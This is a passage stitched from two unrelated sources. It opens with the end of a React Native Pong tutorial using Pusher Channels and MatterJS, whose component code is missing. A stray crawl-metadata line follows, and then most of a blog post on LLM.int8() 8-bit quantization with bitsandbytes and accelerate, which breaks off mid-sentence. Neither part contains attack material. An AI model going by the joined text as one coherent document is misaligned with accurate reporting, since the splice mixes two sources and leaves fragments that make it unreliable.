param_cls = type(module._parameters[name]) kwargs = module._parameters[name].__dict__ module._parameters[name] = param_cls(module._parameters[name].to(torch.device("meta")), **kwargs)
Now that this is fixed, we can easily leverage this context manager and play with it to replace all
nn.Linear modules to
bnb.nn.Linear8bitLt at no memory cost using a custom function!
def replace_8bit_linear(model, threshold=6.0, module_to_not_convert="lm_head"): for name, module in model.named_children(): if len(list(module.children())) > 0: replace_8bit_linear(module, threshold, module_to_not_convert) if isinstance(module, nn.Linear) and name != module_to_not_convert: with init_empty_weights(): model._modules[name] = bnb.nn.Linear8bitLt( module.in_features, module.out_features, module.bias is not None, has_fp16_weights=False, threshold=threshold, ) return model
This function recursively replaces all
nn.Linear layers of a given model initialized on the
meta device and replaces them with a
Linear8bitLt module. The attribute
has_fp16_weights has to be set to
False in order to directly load the weights in
int8 together with the quantization statistics.
We also discard the replacement for some modules (here the
lm_head) since we want to keep the latest in their native precision for more precise and stable results.
But it isn't over yet! The function above is executed under the
init_empty_weights context manager which means that the new model will be still in the
meta device.
For models that are initialized under this context manager,
accelerate will manually load the parameters of each module and move them to the correct devices.
In
bitsandbytes, setting a
Linear8bitLt module's device is a crucial step (if you are curious, you can check the code snippet here) as we have seen in our toy script.
Here the quantization step fails when calling it twice. We had to come up with an implementation of
accelerate's
set_module_tensor_to_device function (termed as
set_module_8bit_tensor_to_device) to make sure we don't call it twice. Let's discuss this in detail in the section below!
Be very careful on how to set devices with
accelerate
Here we played a very delicate balancing act with the
accelerate library!
Once you load your model and set it on the correct devices, sometimes you still need to call
set_module_tensor_to_device to dispatch the model with hooks on all devices. This is done inside the
dispatch_model function from
accelerate, which involves potentially calling
.to several times and is something we want to avoid.
2 Pull Requests were needed to achieve what we wanted! The initial PR proposed here broke some tests but this PR successfully fixed everything!
Wrapping it all up
Therefore the ultimate recipe is:
- Initialize a model in the
metadevice with the correct modules
- Set the parameters one by one on the correct GPU device and make sure you never do this procedure twice!
- Put new keyword arguments in the correct place everywhere, and add some nice documentation
- Add very extensive tests! Check our tests here for more details This may sound quite easy, but we went through many hard debugging sessions together, often times involving CUDA kernels!
All said and done, this integration adventure was very fun; from deep diving and doing some "surgery" on different libraries to aligning everything and making it work!
Now time to see how to benefit from this integration and how to successfully use it in
transformers!
How to use it in
transformers
Hardware requirements
8-bit tensor cores are not supported on the CPU. bitsandbytes can be run on 8-bit tensor core-supported hardware, which are Turing and Ampere GPUs (RTX 20s, RTX 30s, A40-A100, T4+). For example, Google Colab GPUs are usually NVIDIA T4 GPUs, and their latest generation of GPUs does support 8-bit tensor cores. Our demos are based on Google Colab so check them out below!
Installation
Just install the latest version of the libraries using the commands below (make sure that you are using python>=3.8) and run the commands below to try out
pip install accelerate pip install bitsandbytes pip install git+
Example demos - running T5 11b on a Google Colab
Check out the Google Colab demos for running 8bit models on a BLOOM-3B model!
Here is the demo for running T5-11B. The T5-11B model checkpoint is in FP32 which uses 42GB of memory and does not fit on Google Colab. With our 8-bit modules it only uses 11GB and fits easily:
Or this demo for BLOOM-3B:
Scope of improvements
This approach, in our opinion, greatly improves access to very large models. With no performance degradation, it enables users with less compute to access models that were previously inaccessible. We've found several areas for improvement that can be worked on in the future to make this method even better for large models!
Faster inference speed for smaller models
As we have seen in the the benchmarking section, we could improve the runtime speed for small model (<=6B parameters) by a factor of almost 2x. However, while the inference speed is robust for large models like BLOOM-176B there are still improvements to be had for small models. We already identified the issues and likely recover same performance as fp16, or get small speedups. You will see these changes being integrated within the next couple of weeks.
Support for Kepler GPUs (GTX 1080 etc)
While we support all GPUs from the past four years, some old GPUs like GTX 1080 still see heavy use. While these GPUs do not have Int8 tensor cores, they do have Int8 vector units (a kind of "weak" tensor core). As such, these GPUs can also experience Int8 acceleration. However, it requires a entire different stack of software for fast inference. While we do plan to integrate support for Kepler GPUs to make the LLM.int8() feature more widely available, it will take some time to realize this due to its complexity.
Saving 8-bit state dicts on the Hub
8-bit state dicts cannot currently be loaded directly into the 8-bit model after being pushed on the Hub. This is due to the fact that the statistics (remember
weight.CB and
weight.SCB) computed by the model are not currently stored or taken into account inside the state dict, and the
Linear8bitLt module does not support this feature yet.
We think that having the ability to save that and push it to the Hub might contribute to greater accessibility.
CPU support
CPU devices do not support 8-bit cores, as was stated at the beginning of this blogpost. Can we, however, get past that? Running this module on CPUs would also significantly improve usability and accessibility.
Scaling up on other modalities
Currently, language models dominate very large models. Leveraging this method on very large vision, audio, and multi-modal models might be an interesting thing to do for better accessibility in the coming years as these models become more accessible.
Credits
Huge thanks to the following who contributed to improve the readability of the article as well as contributed in the integration procedure in
transformers (listed in alphabetic order):
JustHeuristic (Yozh),
Michael Benayoun,
Stas Bekman,
Steven Liu,
Sylvain Gugger,
Tim Dettmers | https://huggingface.co/blog/hf-bitsandbytes-integration | CC-MAIN-2022-40 | refinedweb | 4,613 | 55.13 |
Arch Space
Description
The Space tool allows you to define an empty volume, either by basing it on a solid shape, or by defining its boundaries, or a mix of both. If it is based solely on boundaries, the volume is calculated by starting from the bounding box of all the given boundaries, and subtracting the spaces behind each boundary. The space object always defines a solid volume. The floor area of a space object, calculated by intersecting a horizontal plane at the center of mass of the space volume, can also be displayed.
Space object created from an existing solid object, then two wall faces are added as boundaries.
How to use
- Select an existing solid object, or faces on boundary objects.
- Press the
Arch Space button, or press S, P keys.
Limitations
- The boundaries properties is currently not editable via GUI.
- See the forum announcement.
Properties
- DATABase: The base object, if any (must be a solid)
- DATABoundaries: A list of optional boundary elements
- DATAArea: The computed floor area of this space
- DATAFinishFloor: The finishing of the floor of this space
- DATAFinishWalls: The finishing of the walls of this space
- DATAFinishCeiling: The finishing of the ceiling of this space
- DATAGroup: Objects that are included inside this space, such as furniture
- DATASpaceType: The type of this space
- DATAFloorThickness: The thickness of the floor finish
- DATANumberOfPeople: The number of people who typically occupy this space
- DATALightingPower: The electric power needed to light this space in Watts
- DATAEquipmentPower: The electric power needed by the equipment of this space in Watts
- DATAAutoPower: If True, Equipment Power will be automatically filled by the equipment included in this space
- DATAConditioning: The type of air conditioning of this space
- DATAInternal: Specifies if this space is internal or external
- VIEWText: The text to show. Use $area, $label, $tag, $floor, $walls, $ceiling to insert the respective data
- VIEWFontName: The name of the font
- VIEWTextColor: The color of the text
- VIEWFontSize: The size of the text
- VIEWFirstLine: The size of the first line of text (multiplies the font size. 1 = same size, 2 = double size, etc..)
- VIEWLineSpacing: The space between the lines of text
- VIEWTextPosition: The position of the text. Leave (0,0,0) for automatic position
- VIEWTextAlign: The justification of the text
- VIEWDecimals: The number of decimals to use for calculated texts
- VIEWShowUnit: Show the unit suffix or not
Options
- To create zones that group several spaces, use a Arch BuildingPart and set its IFC type to "Spatial Zone"
- The space object has the same display modes as other Arch and Part objects, with one more, called Footprint, that displays only the bottom face of the space. introduced in version 0.19
Scripting
See also: Arch API and FreeCAD Scripting Basics.
The Space tool can be used in macros and from the Python console by using the following function:
Space = makeSpace(objects=None, baseobj=None, name="Space")
- Creates a
Spaceobject from the given
objectsor
baseobj, which can be
- one document object, in which case it becomes the base shape of the space object, or
- a list of selection objects as returned by
FreeCADGui.Selection.getSelectionEx(), or
- a list of tuples
(object, subobjectname)
Example:
import FreeCAD, Arch Box = FreeCAD.ActiveDocument.addObject("Part::Box", "Box") Box.Length = 1000 Box.Width = 1000 Box.Height = 1000 Space = Arch.makeSpace(Box) Space.ViewObject.LineWidth = 2 FreeCAD.ActiveDocument.recompute()
After a space object is created, selected faces can be added to it with the following code:
import FreeCAD, FreeCADGui, Draft, Arch points = [FreeCAD.Vector(-500, 0, 0), FreeCAD.Vector(1000, 1000, 0)] Line = Draft.makeWire(points) Wall = Arch.makeWall(Line, width=150, height=2000) FreeCAD.ActiveDocument.recompute() # Select a face of the wall selection = FreeCADGui.Selection.getSelectionEx() Arch.addSpaceBoundaries(Space, selection)
Boundaries can also be removed, again by selecting the indicated faces:
selection = FreeCADGui.Selection.getSelectionEx() Arch.removeSpaceBoundaries(Space, selection)
- | https://www.freecadweb.org/wiki/index.php?title=Arch_Space | CC-MAIN-2019-30 | refinedweb | 636 | 51.38 |
Mapping Geo Data¶
Bokeh has started adding support for working with Geographical data. There are a number of powerful features already available, but we still have more to add. Please tell use your use cases through the mailing list or on github so that we can continue to build out these features to meet your needs.
GeoJSON Datasource¶
GeoJSON is a popular open standard for representing geographical features with JSON. It describes points, lines and polygons (called Patches in Bokeh) as a collection of features. Each feature can also have a set of properties.
Bokeh’s
GeoJSONDataSource can be used almost seamlessly in place of Bokeh’s
ColumnDataSource. For example:
from bokeh.io import output_file, show from bokeh.models import GeoJSONDataSource from bokeh.plotting import figure from bokeh.sampledata.sample_geojson import geojson geo_source = GeoJSONDataSource(geojson=geojson) p = figure() p.circle(x='x', y='y', alpha=0.9, source=geo_source) output_file("geojson.html") show(p)
The important thing to know is that behind the scenes, Bokeh converts the GeoJSON coordinates into columns called x and y (z where appropriate) or xs and ys depending on whether the features are Points, Lines, MultiLines, Polygons or MultiPolygons. Properties with clashing names will be overridden when the GeoJSON is converted, so the following code would not behave as expected.
Warning
If your GeoJSON properties contain a property x and you want to use this to set the size of your circles, and you do this:
Antipattern this will not work.
p.circle(size='x', alpha=0.9, source=geo_source)
You will not get the plot you expect because this is equivalent to
p.circle(x='x', y='y', size='x', alpha=0.9, source=geo_source)
and the x value from your properties will be overridden with the longitude values from your geometry coordinates.
Google Maps support¶
With the GMapPlot, you can plot any bokeh glyphs over a Google Map.
from bokeh.io import output_file, show from bokeh.models import ( GMapPlot, GMapOptions, ColumnDataSource, Circle, Range1d, PanTool, WheelZoomTool, BoxSelectTool ) map_options = GMapOptions(lat=30.29, lng=-97.73, map_type="roadmap", zoom=11) plot = GMapPlot(x_range=Range1d(), y_range=Range1d(), map_options=map_options) plot.title.text = "Austin" # For GMaps to function, Google requires you obtain and enable an API key: # # # # Replace the value below with your personal API key: plot.api_key = "GOOGLE_API_KEY" source = ColumnDataSource( data=dict( lat=[30.29, 30.20, 30.29], lon=[-97.70, -97.74, -97.78], ) ) circle = Circle(x="lon", y="lat", size=15, fill_color="blue", fill_alpha=0.8, line_color=None) plot.add_glyph(source, circle) plot.add_tools(PanTool(), WheelZoomTool(), BoxSelectTool()) output_file("gmap_plot.html") show(plot)
Warning
There is an open issue documenting points appearing to be ~10px off from their intended location.
Google has its own terms of service for using Google Maps API and any use of Bokeh with Google Maps must be within Google’s Terms of Service
Tile Providers¶
Bokeh plots can also consume XYZ tile services which use the Web Mercator projection. The module
bokeh.tile_providers contains several pre-configured tile sources with appropriate attribution which can be added to a plot using the .add_tile() method.
from bokeh.io import output_file, show from bokeh.plotting import figure from bokeh.tile_providers import STAMEN_TONER bound = 20000000 # meters fig = figure(tools='pan, wheel_zoom', x_range=(-bound, bound), y_range=(-bound, bound)) fig.axis.visible = False fig.add_tile(STAMEN_TONER) output_file("stamen_toner_plot.html") show(fig) | https://docs.bokeh.org/en/0.12.11/docs/user_guide/geo.html | CC-MAIN-2020-34 | refinedweb | 556 | 50.53 |
This is the second part of a tutorial series on building an analytical web application with Cube.js. You can find the first part here..
In this part, we are going to add Funnel Analysis to our application. Funnel Analysis, alongside with Retention Analysis, is vital to analyze behavior across the customer journey. A funnel is a series of events that a user goes through within the app, such as completing an onboarding flow. A user is considered converted through a step in the funnel if she performs the event in the specified order. Calculating how many unique users made each event could show you a conversion rate between each step. It helps you to localize a problem down to a certain stage.
Since our application tracks its own usage, we'll build funnels to show how well users navigate through the funnels usage. Quite meta, right?
Here’s how it looks. You check the live demo here.
Building SQL for Funnels
Just a quick recap of part I—we are collecting data with the Snowplow tracker, storing it in S3, and querying with Athena and Cube.js. Athena is built on Presto, and supports standard SQL. So to build a funnel, we need to write a SQL code. Real-world funnel SQL could be quite complex and slow from a performance perspective. Since we are using Cube.js to organize data schema and generate SQL, we can solve both of these problems.
Cube.js allows the building of packages, which are a collection of reusable data schemas. Some of them are specific for datasets, such as the Stripe Package. Others provide helpful macros for common data transformations. And one of them we're going to use—the Funnels package.
If you are new to Cube.js Data Schema, I strongly recommend you check this or that tutorial first and then come back to learn about the funnels package.
The best way to organize funnels is to create a separate cube for each funnel. We'll use
eventFunnel from the Funnel package. All we need to do is to pass an object with the required properties to the
eventFunnel function.
Check the Funnels package documentation for detailed information about its configuration.
Here is how this config could look. In production applications, you're most likely going to generate Cubes.js schema dynamically. You can read more about how to do it here.
import Funnels from "Funnels";import { eventsSQl, PAGE_VIEW_EVENT, CUSTOM_EVENT } from "./Events.js";cube("FunnelsUsageFunnel", {extends: Funnels.eventFunnel({userId: {sql: `user_id`},time: {sql: `time`},steps: [{name: `viewAnyPage`,eventsView: {sql: `select * from (${eventsSQl}) WHERE event = '${PAGE_VIEW_EVENT}`}},{name: `viewFunnelsPage`,eventsView: {sql: `select * from (${eventsSQl}) WHERE event = '${PAGE_VIEW_EVENT} AND page_title = 'Funnels'`},timeToConvert: "30 day"},{name: `funnelSelected`,eventsView: {sql: `select * from (${eventsSQl}) WHERE event = '${CUSTOM_EVENT} AND se_category = 'Funnels' AND se_action = 'Funnel Selected'`},timeToConvert: "30 day"}]})});
The above, 3-step funnel, describes the user flow from viewing any page, such as the home page, to going to Funnels and then eventually selecting a funnel from the dropdown. We're setting
timeToConvert to 30 days for the 2nd and 3rd steps. This means we give a user a 30 day window to let her complete the target action to make it to the funnel.
In our example app, we generate these configs dynamically. You can check the code on Github here.
Materialize Funnels SQL with Pre-Aggregations
As I mentioned before, there is a built-in way in Cube.js to accelerate queries’ performance.
Cube.js can materialize query results in a table. It keeps them up to date and queries them instead of raw data. Pre-Aggregations can be quite complex, including multi-stage and dependency management. But for our case, the simplest
originalSql pre-aggregation should be enough. It materializes the base SQL for the cube.
Learn more about pre-aggregations here.
import Funnels from 'Funnels';import { eventsSQl, PAGE_VIEW_EVENT, CUSTOM_EVENT } from './Events.js';cube('FunnelsUsageFunnel', {extends: Funnels.eventFunnel({ ... }),preAggregations: {main: {type: `originalSql`}}});
Visualize
There are a lot of way to visualize a funnel. Cube.js is visualization-agnostic, so pick one that works for you and fits well into your app design. In our example app, we use a bar chart from the Recharts library.
The Funnels package generates a cube with
conversions and
conversionsPercent measures, and
steps and
time dimensions. To build a bar chart funnel, we need to query the
conversions measure grouped by the
step dimension. The
time dimension should be used in the filter to allow users to select a specific date range of the funnel.
Here is the code (we are using React and the Cube.js React Client):
import React from "react";import cubejs from "@cubejs-client/core";import { QueryRenderer } from "@cubejs-client/react";import CircularProgress from "@material-ui/core/CircularProgress";import { BarChart, Bar, XAxis, YAxis, CartesianGrid, Tooltip } from "recharts";const cubejsApi = cubejs("YOUR-API-KEI",{ apiUrl: "" });const Funnel = ({ dateRange, funnelId }) => (<QueryRenderercubejsApi={cubejsApi}query={{measures: [`${funnelId}.conversions`],dimensions: [`${funnelId}.step`],filters: [{dimension: `${funnelId}.time`,operator: `inDateRange`,values: dateRange}]}}render={({ resultSet, error }) => {if (resultSet) {return (<BarChartwidth={600}height={300}margin={{ top: 20 }}data={resultSet.chartPivot()}><CartesianGrid strokeDasharray="3 3" /><XAxis dataKey="x" minTickGap={20} /><YAxis /><Tooltip /><Bar dataKey={`${funnelId}.conversions`}</BarChart>);}return "Loading...";}}/>);export default Funnel;
If you run this code in CodeSandbox, you should see something like this.
The above example is connected to the Cube.js backend from our event analytics app.
In the next part, we’ll walk through how to build a dashboard and dynamic query builder, like one in Mixpanel or Amplitude. Part 4 will cover the Retention Analysis. In the final part, we will discuss how to deploy the whole application in the serverless mode to AWS Lambda.
You can check out the full source code of the application here.
And the live demo is available here. | https://statsbot.co/blog/building-open-source-mixpanel-alternative-2/ | CC-MAIN-2021-49 | refinedweb | 964 | 58.38 |
Rider. Remember to also check out our ReSharper 2021.3 roadmap, as some features will magically appear in Rider as well!
- .NET 6 Support – Our plan is to invest significant time and effort in supporting the upcoming release of .NET 6. While development is possible for the .NET 6 Preview in some parts, it is yet to be completed until the final release is done. .NET 6 is the future of .NET, and we want to help developers get there.
- C# 10 Support – This will be done as part of our ReSharper 2021.3 roadmap, but while you’re here: we will work on supporting all the new language features, including constant interpolated strings, record structs, list patterns, global using directives, file-scope namespaces, and many more!
- Windows 11 and macOS Monterey – Like .NET itself, our operating systems are progressing to look more beautiful and be more accessible. We will work on Rider (and IntelliJ IDEA) to blend in nicely with your preferred future operating system.
- Apple M1 Support – Apple’s M1 was a huge thing for some developers. We will be continuing our efforts to give you a consistent experience for this great new ARM-based chip. You can check out our latest Rider 2021.2 Apple Silicon edition already! Just note the list of known issues, and let us know if you experience any new ones.
- Code With Me – Our solution for collaborative coding is still one of our top priorities for the next Rider release. As you may know, Rider already has a unique architecture that mixes the IntelliJ IDEA frontend with the ReSharper backend. Much of this adds to the complexity for the CWM team, but we are hoping to roll out a version of the plugin for Rider as soon as possible!
- New Debugger UI – Our IntelliJ IDEA team is working on a new debugger UI, which Rider will inherit. No details for now, but we hope you’re excited to check this out as soon as it becomes available!
- Multiple Startup Projects – Compound configurations are a great Rider feature (inherited from IntelliJ), but they are missing something important – the ability to run/debug different projects in parallel. We are investigating different options for our next release.
- Problems View – We wrote about adopting the IntelliJ IDEA Problems View in our 2021.1 roadmap. Good news – this feature is merged and ready to go, and we are just about to polish the very last bits for Rider! You will get a chance to see it in the first EAP.
- Debug Windows Docker Containers – For several years, Rider has allowed debugging ASP.NET Core projects inside Linux containers. We are looking forward to bringing you the same experience for Docker Windows containers with the first EAP release.
- F# Support – After the debut of the let postfix template, we will try to add more of them to the list. We will also work to bring parameter info for curried functions and method applications without parentheses, as well as better code completion.
- MAUI – Like most developers, we’ll keep a close eye on the development of Microsoft’s new cross-platform framework for mobile and desktop apps, paying special attention to what Rider can and should do to support it.
- UWP Debugging – Another great feature that’s just waiting to be released in the first EAP! UWP projects will be able to run with the debugger attached from the very beginning, as opposed to having to attach it manually.
- Unreal – Our dedicated IDE – Rider for Unreal Engine – has received absolutely great feedback so far and we will be moving forward wherever possible. One of the notable priorities is to improve Perforce support and provide a Linux version.
- Unity – Rider’s great feature set for Unity will see various improvements, such as proper highlighting for conditionally defined code in package sources. We’ll see updates to USS/UXML with support for variables, the new TSS theme files, and checks to keep the UIElements schema files up to date. We’ll also be processing assets in packages to provide more Code Vision links and usages.
Please remember that this is only an excerpt of our plans and that, for various reasons, some parts might have to be postponed. We hope the roadmap has something interesting for you, too. Feel free to comment below, submit a new feature request in our issue tracker if we’ve missed something, or upvote any existing requests to let us know they are important to you. We’re looking forward to your feedback! | https://blog.jetbrains.com/dotnet/2021/08/18/rider-2021-3-roadmap/ | CC-MAIN-2022-27 | refinedweb | 757 | 62.98 |
Lab Exercise 3: Loops, conditionals and command line parameters
The goal of this lab and project is to incorporate loops and conditionals into your code as well as provide more practice in encapsulating code and concepts for later re-use and manipulation.
Tasks
- In your personal file space, make a folder called Project3.
- Open a text editor (e.g TextWrangler). Create a new file called lab3.py. Put a comment at the top of the file with your name, date, and the file name. Save it in the Project3 folder.
- After the comment lines, write the commands to tell python to import the turtle, random, and sys packages:
import turtle
import random
import sys
- First, let's find out what the sys package can do for us. Put the following line of code in your file.
print sys.argv
Save your file, cd to your working directory, and then run your lab3.py file. What do you see?
Now type some additional things on the command line after python lab3.py. For example, try:
python lab3.py hello world 1 2 3
What do you see?
The sys package gives us the ability to see what the user has typed on the command line. Each individual string (defined by spaces) from the command line is an entry in a list, which is a data type that we describe as a sequential container.
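For instance, if you ran python lab3.py hello world 1 2 3, the list would contain six strings. Here is a simulated sketch (the example list below is typed by hand just for illustration — in your program the sys package builds the real list automatically):

```python
# Simulated sys.argv for the command:  python lab3.py hello world 1 2 3
# (in a real program, sys.argv is created for you when the program starts)
argv = ["lab3.py", "hello", "world", "1", "2", "3"]

print(argv[0])   # the program name: lab3.py
print(argv[1])   # the first word after the program name: hello
print(argv[5])   # every entry is a string, even the ones that look like numbers
```

Notice that the last entry is the string '3', not the number 3, which is why converting strings to integers matters.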
- Add the following three lines to your lab3.py file.
print sys.argv[0]
print sys.argv[3] * 3
print int( sys.argv[3] ) * 3
Then run the program using the following command.
python lab3.py three times 3
What is going on? The first of the above three lines prints out the first item in the sys.argv list. The second line accesses the fourth item in the sys.argv list, which is a string with the digit '3' in it, and multiplies it by 3, which repeats the string three times. The third line accesses the fourth item in the sys.argv list, converts it to an integer type and then multiplies it by 3, which prints out the result of 3*3, which is 9.
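You can see the difference between repeating a string and doing arithmetic directly in the Python interpreter. This short sketch (not part of lab3.py) shows both behaviors:

```python
# Multiplying a string by an integer repeats the string
print("3" * 3)        # prints 333

# Converting the string to an integer first gives real arithmetic
print(int("3") * 3)   # prints 9
```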
How could you use the capability to access values from the command line in a program?
- Remove all of the print statements from the prior steps and type (or copy and paste) the following code for making a star into your lab3.py file right after the import statements.
def star(x, y, size):
    turtle.up()
    turtle.goto(x, y)
    turtle.down()
    for i in range(5):
        turtle.forward(size)
        turtle.left(144)

turtle.tracer(False)
turtle.color( 1.0, 1.0, 0.2 )

N = int( sys.argv[1] )
for i in range( N ):
    star( random.randint(-300, 200), random.randint(0, 200), random.randint(5, 15) )

turtle.update()
raw_input('Enter')
Run the code using:
python lab3.py 50
Try running it with other command line values and see what happens. Try running it with no command line value.
- One thing you discover when you write software is that users do not always do what they should. They don't always give you enough information or the correct information. If you want to have a robust program, you have to check the information coming in to see if it is there.
For example, are there reasonable bounds on the number of stars in the image? What if the user does not put a command line parameter?
One strategy is to pick a default value (e.g. 100) and create a variable to hold the default value.
N = 100
If the user gives you a new value, then use the new value.
# check for user input
if len( sys.argv ) > 1:
    N = int( sys.argv[1] )
The idea of having default behavior that the user can override is common in computer programs.
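This pattern can be captured in a small, testable helper. This is only a sketch — the lab's actual code reads sys.argv directly; the argv parameter here is a stand-in so the function can be exercised without command-line input:

```python
def get_count(argv, default=100):
    # Use the default unless the user supplied a command-line value.
    if len(argv) > 1:
        return int(argv[1])
    return default

print(get_count(['lab3.py']))        # 100 (default used)
print(get_count(['lab3.py', '25']))  # 25 (user override)
```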
- Now we're going to explore the range function that is important for common loops in Python. Open up the Python interpreter in a terminal. Then call the built-in function range with a single integer as its argument. What does the function return?
Try giving the function two arguments. What does it return? Try several different pairs of arguments.
Try giving the function three arguments. What does it return? Try several different sets of arguments.
Try getting help on the range function by typing
help( range )
How does it match with what you discovered?
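For reference, here is what the three forms of range produce (wrapped in list() so the values print the same way under Python 3, where range is lazy; in Python 2, range returns the list directly):

```python
print(list(range(5)))         # [0, 1, 2, 3, 4]      one argument: stop
print(list(range(2, 8)))      # [2, 3, 4, 5, 6, 7]   two arguments: start, stop
print(list(range(0, 10, 3)))  # [0, 3, 6, 9]         three arguments: start, stop, step
```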
- Go back to your lab3.py file. You now know what the range function does. Create a function called star2( rays, size ) that takes two arguments. Inside the star function, write a for loop using the range function with rays as the number of times to loop.
Inside the loop, print out the loop variable. The loop variable is the symbol after the for keyword and is also called the loop control variable. The code below is an example.
def star2( rays, size ):
    # loop over the list returned by the range function
    for i in range(rays):
        print i
Put a call to the star2 function with the arguments 10 and 50 in your main code section. Run your program and see what prints out.
- In the star2 function, inside the for loop, set its heading to i * 360 / rays and then have the turtle go forward by size and backward by size.
def star2( rays, size ):
    # loop over the list returned by the range function
    for i in range(rays):
        turtle.setheading( i * 360 / rays )
        turtle.forward( size )
        turtle.backward( size )
What is this going to do? What happens if you give it different arguments?
- Modify your main code so that it checks for a second argument from the command line and assigns an int version of it to the variable rays. Set the default value for the number of rays to 10. Use the variable as the first argument to star2.
When you have it working correctly, you should be able to control the length of each ray and the number of rays in each star from the command line.
- The final lesson on code organization today is enclosing all of your top-level code in a main function and then making the execution of that function dependent upon whether the file was imported into another file or run from the command line.
Put all of your top-level code in the body of a new function called "main". After the main function definition, put the following top-level code.
if __name__ == "__main__": main()
Run your file.
The above conditional statement will be true only when you run the python file on the command line. If you were to import this file into another python program, the conditional statement would evaluate to false and the main function would not run.
The real benefit is that you can write test functions for a collection of functions--like your shapes.py file--without having your test function interfere with importing it into other programs.
From now on, your files should always have that conditional in front of top-level code.
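A minimal sketch of the pattern (the body of main here is just a placeholder):

```python
def main():
    # Top-level test code goes here; it runs only when the file is
    # executed directly, not when it is imported by another program.
    return "tests ran"

if __name__ == "__main__":
    print(main())
```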
When you are done with the lab exercises, you may begin the project. | http://cs.colby.edu/courses/S15/cs151-labs/labs/lab03/ | CC-MAIN-2017-51 | refinedweb | 1,188 | 75.81 |
Compiler Reference Guide
Version 6.14
Prints dependency lines for header files even if the header files are missing.
Warning and error messages on missing header files are suppressed, and
compilation continues.
-MG
-M
-MM
In this example, source.c contains a reference to a missing header file, header.h:
#include <stdio.h>
#include "header.h"
int main(void){
puts("Hello world\n");
return 0;
}
This first example is compiled without the -MG option, and results in an error:
armclang --target=aarch64-arm-none-eabi -mcpu=cortex-a53 -M source.c
source.c:2:10: fatal error: 'header.h' file not found
#include "header.h"
^
1 error generated.
This second example is compiled with the -MG option, and the error is suppressed:
armclang --target=aarch64-arm-none-eabi -mcpu=cortex-a53 -M -MG source.c
source.o: source.c \
/include/stdio.h \
header. | https://www.keil.com/support/man/docs/armclang_ref/armclang_ref_vvi1454597476176.htm | CC-MAIN-2020-40 | refinedweb | 149 | 53.27 |
A tool that automatically formats Python code to conform to the PEP 8 style guide
Project Description
From easy_install:
$ easy_install -ZU autopep8
Usage
To modify a file in place (with all fixes enabled):
$ autopep8 --in-place --aggressive <filename>
Before running autopep8.

import sys, os;


def someone_likes_semicolons(   foo = None ,\
     bar='bar'):
    """Hello; bye."""; print('A'<>foo<>134342<>23434<>3!=3<>5!=3)# <> is a deprecated form of !=
    return 0;


def func11():
    a=(   1,2, 3,"a"  );


####This is a long comment. This should be wrapped to fit within 72 characters.
some_variable = [100,200,300,9876543210,'This is a long string that goes on']


def func22(): return {'has_key() is deprecated':True}.has_key({'f':2}.has_key(''));

After running autopep8.

import sys
import os


def someone_likes_semicolons(foo=None,
                             bar='bar'):
    """Hello; bye."""
    # <> is a deprecated form of !=
    print('A' != foo != 134342 != 23434 != 3 != 3 != 5 != 3)
    return 0


def func11():
    a = (1, 2, 3, "a")


# This is a long comment. This should be wrapped to fit within 72
# characters.
some_variable = [
    100, 200, 300, 9876543210, 'This is a long string that goes on']


def func22():
    return ('' in {'f': 2}) in {'has_key() is deprecated': True}

Options:

--exclude=globs       exclude files/directories that match these comma-separated globs
--list-fixes          list codes for fixes; used by --ignore and --select
--ignore=errors       do not fix these errors/warnings (default: E24,W6)
--select=errors       fix only these errors/warnings (e.g. E4,W)
--max-line-length=n   set maximum allowed line length (default: 79)

Fixes (excerpt):

E27  - Fix extraneous whitespace around keywords.
E301 - Add missing blank line.
E302 - Add missing 2 blank lines.
E303 - Remove extra blank lines.
E304 - Remove blank line following function decorator.
W191 - Reindent all lines.
W291 - Remove trailing whitespace.
W293 - Remove trailing whitespace on blank line.
W391 - Remove trailing blank lines.
E26  - Format block comments.
W6   - Fix various deprecated code (via lib2to3).
W602 - Fix deprecated form of raising exception.
autopep8 also fixes some issues not found by pep8.
- Correct deprecated or non-idiomatic Python code (via lib2to3). (This is triggered if W6 is enabled.)
- Format block comments. (This is triggered if E26 is enabled.)
- Normalize files with mixed line endings.
- Put a blank line between a class declaration and its first method declaration. (Enabled with E301.)
- Remove blank lines between a function declaration and its docstring. (Enabled with E303.)
More advanced usage
To enable only a subset of the fixes, use the --select option. For example, to fix various types of indentation issues:
$ autopep8 --select=E1,W1 <filename>
Similarly, to just fix deprecated code:
$ autopep8 --select=W6 <filename>
--aggressive will also shorten lines more aggressively. It will also remove trailing whitespace more aggressively. (Usually, we don’t touch trailing whitespace in docstrings and other multiline strings. And to do even more aggressive changes to docstrings, use docformatter.)
Use as a module
The simplest way of using autopep8 as a module is via the fix_string() function.
>>> import autopep8
>>> autopep8.fix_string('x=1\n')
'x = 1\n'
#include <unistd.h>

pid_t tcgetpgrp(int fd);

int tcsetpgrp(int fd, pid_t pgrp);
EBADF
    fd is not a valid file descriptor.

EINVAL
    pgrp has an unsupported value.

ENOTTY
    The calling process does not have a controlling terminal, or it has one but it is not described by fd, or, for tcsetpgrp(), this controlling terminal is no longer associated with the session of the calling process.

EPERM
    pgrp has a supported value, but is not the process group ID of a process in the same session as the calling process.
For an explanation of the terms used in this section, see attributes(7).
These functions are implemented via the TIOCGPGRP and TIOCSPGRP ioctls.
setpgid(2), setsid(2), credentials(7) | http://manpages.courier-mta.org/htmlman3/tcgetpgrp.3.html | CC-MAIN-2017-22 | refinedweb | 104 | 65.62 |
Deploy software to a private IBM Cloud Hyper Protect Virtual Server using IBM toolchain
Build, test, and deploy on custom servers with the IBM Delivery Pipeline
With IBM Cloud Continuous Delivery, you can build, test, deploy, and manage apps with toolchains. IBM Cloud Continuous Delivery includes delivery pipelines, making these tasks automated, which in turn, requires little to no human interference.
In this tutorial, you’ll learn how to deploy on custom servers using the IBM Delivery Pipeline, which is commonly used to deploy builds on Kubernetes or Cloud Foundry. We’ll be using the demo application AcmeAir, a Node.js implementation of the Acme Air Sample Application. The code will be automatically integrated, dockerized on a custom-built server, uploaded to a private container registry, and deployed on multiple custom servers (in this case the IBM Cloud Hyper Protect Virtual Servers). The best part is that all of this can be done using resources available through an IBM Cloud account. Let’s get started!
Prerequisites
To complete this tutorial, you need the following:
- A computer to customize the toolchain running Docker
- An IBM Cloud account
- A configured IBM Cloud Container Registry
Estimated time
Completing this tutorial should take about 1 hour.
Step 1: Set up your Hyper Protect Virtual Server
To begin, you need to create the server required to deploy your software on the private server. Don’t worry, setting up a Hyper Protect Virtual Server is simple.
Begin by opening the command line interface (CLI) on your computer and generate an SSH key pair by entering the command ssh-keygen and following the instructions. Make sure to remember where you store your SSH keys (you may need to install OpenSSH before doing this).
